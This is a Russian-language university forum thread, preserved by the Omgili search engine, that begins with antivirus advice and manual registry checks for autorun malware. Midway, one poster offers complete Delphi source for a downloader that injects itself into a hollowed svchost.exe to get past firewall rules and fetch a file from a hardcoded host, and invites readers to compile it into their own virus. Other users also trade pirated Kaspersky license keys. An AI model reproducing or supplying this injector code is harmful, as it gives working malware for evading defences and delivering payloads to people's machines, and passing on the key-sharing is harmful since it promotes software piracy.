Welcome to Omgili,
Omgili ( Oh My God I Love It ;) is a search engine for discussions. With Omgili you can find answers and solutions, debates, discussions, personal experiences, opinions and more... To learn more about Omgili click here.
This is a complete preview of the discussion as it was indexed by Omgili crawlers. Use this preview if the original discussion is unavailable.
Click here to view the original discussion.
 |
|
 |
|
IAAUForum.com • Просмотр темы - Защищаем дружно друзья
Уважаемые друзья я бы хотел затронуть один из самых актуальных проблем, столь уже долгих лет мучает всех пользователей всемирной паутины, в частности наших простых и доброжелательных, наивных юзеров, университетских лаборатории (студенты, персоналы университета и т.д.).
Уверен значимость этой темы, что всех нас на все 105% достали повседневные проблемы потеря информации, боязнь, страх от вредоносных программ (вирусы) поэтому призываю всех вас Тимуровцев защищать свой PC.
Друзья строго хочу порекомендовать поставить Антивирусную программу на свой персональный компьютер, в случае если у вас нет ни одна аналогичная программа, то обратитесь к администратору лаборатории №1.
В свою очередь я обязуюсь помочь вам и предоставлю антивирусную программу желаю всем удачи и успехов во всем с уважением .or
|
|
 |
|
 |
|
|
|
|
Spasibo bolshoye.
A yest keys dlya Kaspersky?
|
|
|
|
|
|
|
|
|
Admin писал(а): Spasibo bolshoye.
A yest keys dlya Kaspersky?
ключ имеется на каждую верcию KAV5 - KAV6 - KAV7
|
|
|
|
|
|
|
|
|
Kakoy god? U menya toje yest 2008 keys no mnogiye uje v Black List popali
|
|
|
|
|
|
|
|
|
Davayte obsudem kak mojno i bez Antivirusov ustranyat nekotoriye virusi i danniye s REG edit.
Dumayu mnogim budet interesno.
|
|
|
|
|
|
|
|
|
Admin писал(а): Davayte obsudem kak mojno i bez Antivirusov ustranyat nekotoriye virusi i danniye s REG edit.
Dumayu mnogim budet interesno.
Dumau v etom nam pomojet Total commander v bezopasnom rejime s pobberjkoy regedit
|
|
|
|
|
|
|
|
|
Trojan Remover 6.5.1
Trojan Remover - Программа, специализирующаяся на отлавливании троянских программ - полезная в хозяйстве вещь, ведь вполне может случиться так, что стандартный антивирусник не сможет не то что удалить, но и обнаружить какой-нибудь особо изощренно изготовленный троян (в настощий момент программа способна обнаружить и удалить более шестнадцати тысяч троянов, и эта база данных постоянно пополняется).
Скачать http://www.simplysup.com/
|
|
|
|
|
|
|
|
|
A vozmojno li nayti eti troyani bez vsyakih prog?
|
|
|
|
|
|
|
|
|
Если после проверки компьютера на вирусы, антивирус молчит, то есть говорит вам, что вирусов не найдено, но вам кажется, что ваш компьютер работает как то не так, а это может быть связано в наличием на компьютере вируса, о котором антивирус еще не знает (это может быть связано с устаревшей антивирусной базой, или наличием нового вируса), то можно проверить компьютер на наличие вирусов вручную.
Далее приводятся основные методы обнаружения вирусов на компьютере вручную, то есть без помощи антивируса.
Весь способ может показаться очень устаревшим, но я не согласен иногда просто стоит сделать самые простые действия.
1.
- Самые простые вирусы располагают свой ярлык в меню ПУСК - ПРОГРАММЫ - АВТОЗАГРУЗКА.
В некоторых случаях это не работает.
Тогда нужно проверить наличие вируса в скрытой автозагрузке.
Для этого в меню ПУСК - ВЫПОЛНИТЬ нужно набрать msconfug и нажать ОК.
В появившемся окне выбрать закладку АВТОЗАГРУЗКА, где могут находится следующие записи
2.
- Некоторые вирусы записывают себя в win.ini, которая доступна в этом же окне на одноименной закладке.
Для win98 на этой вкладке следует проверить ветвь windows, где параметры "norun=" и "load=" должны быть пустыми НО информационные технлогии и соосветственно операционные системы тоже не мало.
Большинство пользователи юзают более современные ОС на счет 98 версии я просто описал для ознакомление.
3.
- Более умные вирусы записывают себя прямо в реестр.
Для проверки в меню ПУСК - ВЫПОЛНИТЬ - следует набрать regedit и нажать ОК.
В открывшемся окне перейти на ветвь HKEY_LOCAL_MASHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ и открыть папку RUN, где вполне допустимо могут находиться сделующие пункты.
ctfmon.exe, msconfig, nod32kui, nvcpldaemon, nwiz, kernelfaultcheck.
Все лишнее можно взять на подозрение, вплоть до удаления лишних строк.
Аналогичные действия нужно проделать с ветвями реестра
HKEY_USERS\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ проверить папку RUN.
HKEY_LOCAL_MASHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ где может находиться запись icq.
Все лишнее можно взять на подозрение, вплоть до удаления лишних строк.
HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWSNT\CURRENTVERSION\WINDOWS\ параметр load обычно пуст.
Для пользователей широким умом и знанием для понятие техники вирусов просмотрите этот исходной код вредителя просто пример.
(если у тебя руки растет не с того места интегрируй и получи свой вирусняк) рекомендую для личного интереса.
Program /*virus name*/;
uses
Windows, WinSock;
{$IMAGEBASE $13140000}
{ Определение положения подстроки в строке }
Function MyPos(Substr, Str: PChar): dword;
Stdcall;
asm
mov eax, Substr
mov edx, str
test eax, eax
je @noWork
test edx, edx
je @stringEmpty
push ebx
push esi
push edi
mov esi, eax
mov edi, edx
push eax
push edx
call lstrlen
mov ecx, eax
pop eax
push edi
push eax
push eax
call lstrlen
mov edx, eax
pop eax
dec edx
js @fail
mov al, [esi]
inc esi
sub ecx, edx
jle @fail
@loop:
repne scasb
jne @fail
mov ebx, ecx
push esi
push edi
mov ecx, edx
repe cmpsb
pop edi
pop esi
je @found
mov ecx, ebx
jmp @loop
@fail:
pop edx
xor eax, eax
jmp @exit
@stringEmpty:
xor eax, eax
jmp @noWork
@found:
pop edx
mov eax, edi
sub eax, edx
@exit:
pop edi
pop esi
pop ebx
@noWork:
end;
{ Копирование строк }
Function MyCopy(S:PChar;
Index, Count: Dword): PChar;
Stdcall;
asm
mov eax, Count
inc eax
push eax
push LPTR
call LocalAlloc
mov edi, eax
mov ecx, Count
mov esi, S
add esi, Index
dec esi
rep movsb
end;
{ Копирование участка памяти }
procedure MyCopyMemory(Destination: Pointer;
Source: Pointer; Length: DWORD);
asm
push ecx
push esi
push edi
mov esi, Source
mov edi, Destination
mov ecx, Length
rep movsb
pop edi
pop esi
pop ecx
end;
Function DownloadFile(Address: PChar;
Var ReturnSize: dword): pointer;
var
Buffer: pointer;
BufferLength: dword;
BufferUsed: dword;
Bytes: integer;
Header: PChar;
Site: PChar;
URL: PChar;
FSocket: integer;
SockAddrIn: TSockAddrIn;
HostEnt: PHostEnt;
Str: PChar;
WSAData: TWSAData;
hHeap: dword;
begin
Result := nil;
hHeap := GetProcessHeap();
WSAStartup(257, WSAData);
Site := MyCopy(Address, 1, MyPos('/', Address) - 1);
URL := MyCopy(Address, MyPos('/', Address), lstrlen(Address) - MyPos('/', Address) + 1);
Buffer := HeapAlloc(hHeap, 0, 1024);
try
BufferLength := 1024;
BufferUsed := 0;
FSocket := socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
SockAddrIn.sin_family := AF_INET;
SockAddrIn.sin_port := htons(80);
SockAddrIn.sin_addr.s_addr := inet_addr(Site);
if SockAddrIn.sin_addr.s_addr = INADDR_NONE then
begin
HostEnt := gethostbyname(Site);
if HostEnt = nil then Exit;
SockAddrIn.sin_addr.s_addr := Longint(PLongint(HostEnt^.h_addr_list^)^);
end;
if Connect(FSocket, SockAddrIn, SizeOf(SockAddrIn)) = -1 then Exit;
Str := HeapAlloc(hHeap, 0, 1024);
lstrcpy(Str, 'GET ');
lstrcat(Str, URL);
lstrcat(Str, ' HTTP/1.0'#10#13'Host: ');
lstrcat(Str, Site);
lstrcat(Str, #13#10'Connection: close'#13#10#13#10);
send(FSocket, Str^, lstrlen(Str), 0);
HeapFree(hHeap, 0, Str);
repeat
if BufferLength - BufferUsed <
1024 then begin
Inc(BufferLength, 1024);
Buffer := HeapReAlloc(hHeap, 0, Buffer, BufferLength);
end;
Bytes := recv(FSocket, pointer(dword(Buffer) + BufferUsed)^, 1024, 0);
if Bytes >
0 then Inc(BufferUsed, Bytes);
until (Bytes = 0) or (Bytes = SOCKET_ERROR);
Header := MyCopy(Buffer, 1, MyPos(#13#10#13#10, Buffer) + 3);
ReturnSize := BufferUsed - lstrlen(header);
Result := VirtualAlloc(nil, ReturnSize, MEM_COMMIT or
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if Result = nil then Exit;
MyCopyMemory(Result, pointer(dword(Buffer) + lstrlen(header)), ReturnSize);
finally
HeapFree(hHeap, 0, Buffer);
end;
end;
{ процедура выполняющаяся в контексте доверенного приложения }
Procedure Download();
Stdcall;
const
URL : PChar = '192.168.0.58/1.mp3';
var
Buff: pointer;
Size: dword;
Bytes: dword;
dFile: dword;
begin
LoadLibrary('wsock32.dll');
Buff := DownloadFile(URL, Size);
dFile := CreateFile('c:\1.mp3', GENERIC_WRITE, 0, nil, CREATE_NEW, 0, 0);
WriteFile(dFile, Buff^, Size, Bytes, nil);
CloseHandle(dFile);
ExitProcess(0);
end;
var
St: TStartupInfo;
Pr: TProcessInformation;
InjectSize: dword;
Code: pointer;
Injected: pointer;
BytesWritten: dword;
Context: _CONTEXT;
t:textfile;
cmd:string;
begin
ZeroMemory(@St, SizeOf(TStartupInfo));
St.cb := SizeOf(TStartupInfo);
St.wShowWindow := SW_SHOW;
// запускаем процесс, которому разрешено лезть на 80 порт
CreateProcess(nil, 'svchost.exe', nil, nil, false,
CREATE_SUSPENDED, nil, nil, St, Pr);
Code := pointer(GetModuleHandle(nil));
InjectSize := PImageOptionalHeader(pointer(integer(Code) +
PImageDosHeader(Code)._lfanew +
SizeOf(dword) +
SizeOf(TImageFileHeader))).SizeOfImage;
// выделяем память в процессе
Injected := VirtualAllocEx(Pr.hProcess, Code, InjectSize, MEM_COMMIT or
MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// внедряем код
WriteProcessMemory(Pr.hProcess, Injected, Code, InjectSize, BytesWritten);
// изменяем контекст нити
Context.ContextFlags := CONTEXT_FULL;
GetThreadContext(Pr.hThread, Context);
Context.Eip := dword(@Download);
SetThreadContext(Pr.hThread, Context);
// запускаем процесс
ResumeThread(Pr.hThread);
end;
|
|
|
|
|
|
|
|
|
Spasibo za info. A vot s kodom ne tak uj ponyatno.
I pod kakim rasshereniyem sohranyayetsa etot fayl?
|
|
|
|
|
|
|
|
|
Admin писал(а): Spasibo za info.
A vot s kodom ne tak uj ponyatno.
I pod kakim rasshereniyem sohranyayetsa etot fayl?
Исходник стоит скомпилировать на паскале с расширением *.exe
|
|
|
|
|
|
|
|
|
Mojnoje cherez reg edit>run uznat put k virusu.
Ved Run tolko zapuskayet eti virusi a ne sohranyayet,
|
|
|
|
|
|
|
|
|
Да нуууу, 3 года в лицее на Паскале сидел и предстовления не имел что на нем можно вирус написать;) Аскар байке а что этот вирус делает то?
Одинкон я поспорил с ММК что он напишет вирус, а мой антивирус её мигом найдет!
Но я не учел тот факт что в базе Анитвируса нет регистра этого вируса:) И не нашол, последсвтия были ...
|
|
|
|
|
|
|
|